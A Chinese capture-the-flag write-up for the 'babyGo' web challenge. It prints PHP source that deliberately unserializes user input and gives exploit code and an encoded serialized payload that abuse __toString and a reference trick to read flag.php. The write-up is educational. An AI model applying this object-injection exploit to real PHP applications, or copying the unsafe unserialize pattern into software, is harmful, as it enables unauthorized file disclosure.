安恒杯 一月 web
babyGo
<?php
@error_reporting(1);
include 'flag.php';
class baby {
protected $skyobj;
public $aaa;
public $bbb;
function __construct() {
$this->skyobj = new sec;
}
function __toString() {
if (isset($this->skyobj))
return $this->skyobj->read();
}
}
class cool {
public $filename;
public $nice;
public $amzing;
function read() {
$this->nice = unserialize($this->amzing);
$this->nice->aaa = $sth;
if($this->nice->aaa === $this->nice->bbb) {
$file = "./{$this->filename}";
if (file_get_contents($file)) {
return file_get_contents($file);
}
else {
return "you must be joking!";
}
}
}
}
class sec {
function read() {
return "it's so sec~~";
}
}
if (isset($_GET['data'])) {
$Input_data = unserialize($_GET['data']);
echo $Input_data;
}
else {
highlight_file("./index.php");
}
?>一个简单的反序列化题。
注意到一个魔术方法 __toString(),当 echo $obj; 时会自动调用。
第三行的 include 'flag.php'; 想必 flag 就在这个文件里了。
$this->nice = unserialize($this->amzing);
$this->nice->aaa = $sth;
if($this->nice->aaa === $this->nice->bbb) {只要满足这个 if 就能读到 flag.php
这里有两个思路,
让 amzing 直接为空,反序列化后nice依然为空,得到的 this->nice->aaa和
让this->bbb = &this->aaa,随便 aaa 怎么变。
此处的 exp 为:
$cc = new baby();
$cc->bbb = &$cc->aaa;
print_r(urlencode(serialize($cc)));
/* O%3A4%3A%22baby%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00skyobj%22%3BO%3A3%3A%22s
ec%22%3A0%3A%7B%7Ds%3A3%3A%22aaa%22%3BN%3Bs%3A3%3A%22bbb%22%3BR%3A3%3B%7D */exp
class baby {
protected $skyobj; // cool 对象
public $aaa;
public $bbb;
public function __construct() {
// $this->skyobj = new sec;
$this->skyobj = new cool;
$this->skyobj->filename = 'flag.php';
//$this->skyobj->amzing = 'O%3A4%3A%22baby%22%3A3%3A.........';
}
}
$bb = new baby();
print_r(urlencode(serialize($bb)));url 编码是必要的,避免特殊符号编码(%00丢失)引起的长度歧义,出现 Error at offset 错误。
flag 在源代码里,记得查看。
simple php
这题其实没啥意思,漏洞的简单,拼凑不好玩,其中涉及到的 ThinkPHP 系列漏洞单独总结下。
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2019/01/30,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
